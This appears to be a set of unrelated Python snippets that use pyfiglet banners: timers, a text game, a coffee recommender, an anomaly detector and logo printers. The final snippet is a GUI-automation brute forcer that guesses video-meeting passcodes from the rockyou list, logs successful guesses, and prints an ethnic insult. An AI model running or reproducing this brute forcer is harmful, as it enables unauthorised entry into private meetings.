datetime.now()).total_seconds())) continue elif input_action == INPUT_PLUS: target += timedelta(seconds=10) elif input_action == INPUT_LAP: continue sync_start = sleep_target seconds_left = int(ceil((target - datetime.now()).total_seconds())) if seconds_left <= 0: # we could write this entire block outside the parent while # but that would leave us unable to reset everything if not no_bell: with curses_lock: curses.beep() if text and not no_text_magic: text = normalize_text(text) if outfile: with open(outfile, 'w') as f: f.write("{}\n{}\n".format(text if text else "DONE", 0)) rendered_text = text if text and not no_figlet: try: rendered_text = figlet.renderText(text) except CharNotPrinted: rendered_text = "" if blink or text: base_color = 1 if blink else 0 blink_reset = False flip = True slept = 0 extra_sleep = 0 while True: with curses_lock: os.write( stdout.fileno(), "\033]2;{0}\007".format( "/" if flip else "\\").encode()) if text: draw_text( stdscr, rendered_text, color=base_color if flip else 4, fallback=text, ) else: draw_text(stdscr, "", color=base_color if flip else 4) if blink: flip = not flip try: sleep_start = datetime.now() input_action = input_queue.get( True, 0.5 + extra_sleep) except Empty: input_action = None finally: extra_sleep = 0 sleep_end = datetime.now() if input_action == INPUT_PAUSE: pause_start = datetime.now() input_action = input_queue.get() extra_sleep = (sleep_end - sleep_start).total_seconds() if input_action == INPUT_EXIT: # no elif here! input_action may have changed return elif input_action == INPUT_RESET: sync_start, target = parse_timestr(timespec) seconds_left = int( ceil( (target - datetime.now()).total_seconds())) blink_reset = True break slept += (sleep_end - sleep_start).total_seconds() if quit_after and slept >= float(quit_after): return if blink_reset: continue finally: with curses_lock: if not no_window_title: os.write(stdout.fileno(), "\033]2;\007".encode()) if outfile: os.remove(outfile) quit_event.set() input_thread.join()
h1=dict(double=True), # + bold h2=dict(double=True), h3=dict(double=False, wide=True), # + bold h4=dict(double=False, wide=True), ) else: try: import sys if '-i' in sys.argv: # testing raise ImportError from pyfiglet import Figlet # gettin' figgy with it, na na na… header_mode = HeaderMode.FIGLET Figlet.render = Figlet.renderText _figlet_fonts = dict( h1=Figlet(font='standard', width=_width), h2=Figlet(font='small', width=_width), #~ h3=Figlet(font='wideterm', width=_width), ) except ImportError: header_mode = HeaderMode.NORMAL class StringCache(dict): ''' Used to cache rendered ANSI color/fx strings with a dictionary lookup interface. ''' def __init__(self, palette, **kwargs): self._palette = palette # allows renames to happen, currently supports em --> i self._renames = kwargs
def main(s): countdown_thread.start() # Start the countdown thread dc.update(large_image="main_icon", large_text="https://github.com/nicoladen05/pomodoro", state="Focusing...", end=time() + p.plainTime()) # Update the rich presence while True: try: s.clear() # Clear the screen text = Figlet(font='big') s.addstr(text.renderText(str(p.time( )))) # Print the text which is converted to ascii art by figlet s.addstr(f'\n State: {p.getState().capitalize()}' ) # Print the current state if p.plainTime( ) == 0: # Change the state after the countdown is finished notification(f'{p.getState().capitalize()} has finished!' ) # Send a notification s.addstr( '\n Press any key to continue') # Wait for confirmation curses.flushinp() s.getch() p.changeState() # Change the state to the next one # Set the next timer length if p.getState() == 'study': p.setTime(config.studyTime[0], config.studyTime[1], config.studyTime[2]) dc.update( large_image="main_icon", large_text="https://github.com/nicoladen05/pomodoro", state="Focusing...", end=time() + p.plainTime()) # Update the rich presence elif p.getState() == 'break': p.setTime(config.breakTime[0], config.breakTime[1], config.breakTime[2]) dc.update( large_image="main_icon", large_text="https://github.com/nicoladen05/pomodoro", state="Taking a break", end=time() + p.plainTime()) # Update the rich presence elif p.getState() == 'longBreak': p.setTime(config.longBreakTime[0], config.longBreakTime[1], config.longBreakTime[2]) dc.update( large_image="main_icon", large_text="https://github.com/nicoladen05/pomodoro", state="Taking a long break", end=time() + p.plainTime()) # Update the rich presence continue s.refresh() # Refresh the screen curses.napms(1000) # Sleep for one second except (KeyboardInterrupt, SystemExit): break except curses.error: print("Window too small")
from pyfiglet import Figlet,figlet_format #Create Colour pallete - Foreground colour_end = "\33[0m" colour_red = "\33[31m" colour_green = "\33[32m" colour_yellow = "\33[33m" colour_blue = "\33[34m" #Create Colour pallete - Background colour_violet_bg = "\33[45m" colour_blue_bg = "\33[44m" #Initialize Figlet game_header = Figlet(font= "slant") game_body = Figlet() #Initialize slow character print def Print_Slow(in_message): #Variable to slow display of character slow_display = os.sys.stdout #Loop through the characters for in_char in in_message: #Display character slow_display.write(in_char) #Flush characters
import pandas as pd import numpy as np from sklearn.feature_extraction.text import CountVectorizer from sklearn.metrics.pairwise import cosine_similarity from pyfiglet import Figlet import colorama from colorama import Fore, Back, Style df = pd.read_csv("arabicaWithBrands.csv") f = Figlet(font='standard') #select the valuable attribute columns features = [ 'species', 'brand', 'country', 'region', 'altitude', 'company', 'aroma', 'flavor', 'sweetness', 'body', 'acidity', 'balance', 'uniformity', 'cupperPoints', 'totalPoints' ] #combine column values into single string def combine_features(row): return row['species'] + " " + row['brand'] + " " + row[ 'country'] + " " + row['region'] + " " + row['altitude'] + " " + row[ 'company'] + " " + str(row['aroma']) + " " + str( row['flavor']) + " " + str(row['sweetness']) + " " + str( row['body']) + " " + str(row['acidity']) + " " + str( row['balance']) + " " + str( row['uniformity']) + " " + str( row['cupperPoints']) + " " + str( row['totalPoints'])
from pyfiglet import Figlet prog = "Mirage" descr = "Anomaly Detection Neural Network" print(Figlet(font='ticksslant').renderText(prog)+"\n"+descr+"\n"+"-"*100) import ijson import pandas as pd import argparse import json import os import numpy as np import random from sklearn.preprocessing import MinMaxScaler from anomalous_lib.library.convolutional import Conv1DAutoEncoder from sklearn.metrics import confusion_matrix def test(args, df, config): df_y = df[[' Label']] df = df[[ ' Protocol', ' Destination Port', ' Source Port', 'Init_Win_bytes_forward', ' Init_Win_bytes_backward']] df_preds = predict(args, df, config) threshold = df_preds["Mirage_Anomaly"].mean() tn, fp, fn, tp = confusion_matrix(np.where(df_y[" Label"]=="BENIGN", 0, 1), (df_preds["Mirage_Anomaly"] > threshold)).ravel() print(("FP: {}, FN: {},".format(fp,fn))+'\n'+("TP: {}. TN: {},".format(tp,tn))) print("Accuracy:{}%".format(float(tp+tn)/float(fp+tp+tn+fn))) return pd.concat([df_preds, df_y[" Label"]], axis=1)
def _print_logo(self): from pyfiglet import Figlet f = Figlet(font='big') logger.info("\n%s" % f.renderText("%s %s" % (self.static_config.get("name"), self.static_config.get("version"))))
def _print_logo(self): from pyfiglet import Figlet f = Figlet(font='big') logger.info("\n%s" % f.renderText("CraftBeerPi %s " % self.version)) logger.info("www.CraftBeerPi.com") logger.info("(c) 2021 Manuel Fritsch")
def hello(self): F = Figlet() text = F.renderText('Donurista') print(text)
def brute_force_link(self, meeting_id, dict='./rockyou.txt'): print('[+] Starting to BruteForce Meeting ID : ') open_meeting_loc = pyautogui.locateOnScreen('./Open_Meeting.png') pyautogui.click(open_meeting_loc) self.enter_meeting = pyautogui.locateOnScreen('./Enter-Meeting.png') pyautogui.click(self.enter_meeting) pyautogui.typewrite(f'{meeting_id}') pyautogui.press('enter') if 'Enter meeting passcode' in pyautogui.getAllTitles(): Bruter = Figlet() Bruter.renderText('Ottoman-Bruter') print( '[+] Sultan Abdul Hamid Han II - May God Almighty bless his soul and those martyrs who fought for the Caliphate Against the Young Turks and the Free Masons and Iluminati.' ) print( '[+] Ottoman Motto: Fight against those who Oppress and Protect those who are Oppressed from the Oppressors' ) print('[+] Ottoman-Bruter Forcer Started') if dict == './rockyou.txt': print( '[+] Using Default RockYou Password Dictionary [F**k the Byzantines, aka. British]' ) else: print( '[*] Remember Dict should be of the Format:\n guess1\nguess2\nguess3\n' ) with open(dict, 'r', encoding='utf8', errors='ignore') as f: guess = f.read() self.guess = guess.split('\n') print(f'Password Guesses Loaded: {len(self.guess)}') let_u_in = pyautogui.locateOnScreen('./Let-u-in.png') while let_u_in == None: password_entry_location = pyautogui.locateOnScreen( './passcode.png') if password_entry_location == None: print( '[**] Strange Anomaly Detected there is no Password Entry Box on the Screen' ) print( '[**] Please Bring it up on the Screen for the Program to Continue' ) while password_entry_location == None: password_entry_location = pyautogui.locateOnScreen( './passcode.png') else: pyautogui.click(password_entry_location) for password in self.guess: print(f'[?] Trying Password: {password}') pyautogui.typewrite(password) join_meeting_button = pyautogui.locateOnScreen( './join-meeting.png') pyautogui.click(join_meeting_button) sleep(8) check_fail_1 = pyautogui.locateOnScreen( './failed-attempt.png') if check_fail_1 == None: let_u_in = pyautogui.locateOnScreen('./Let-u-in.png') if let_u_in != None: print( f'[+] Password Found Now in Waiting Room - Password is {password} for ID {meeting_id}' ) with open('works.txt', 'a+') as f: f.write(f'{meeting_id}:{password}\n') break print('Ottoman Brute Forcer Completed Execution') print('Allah is the Greatest ....')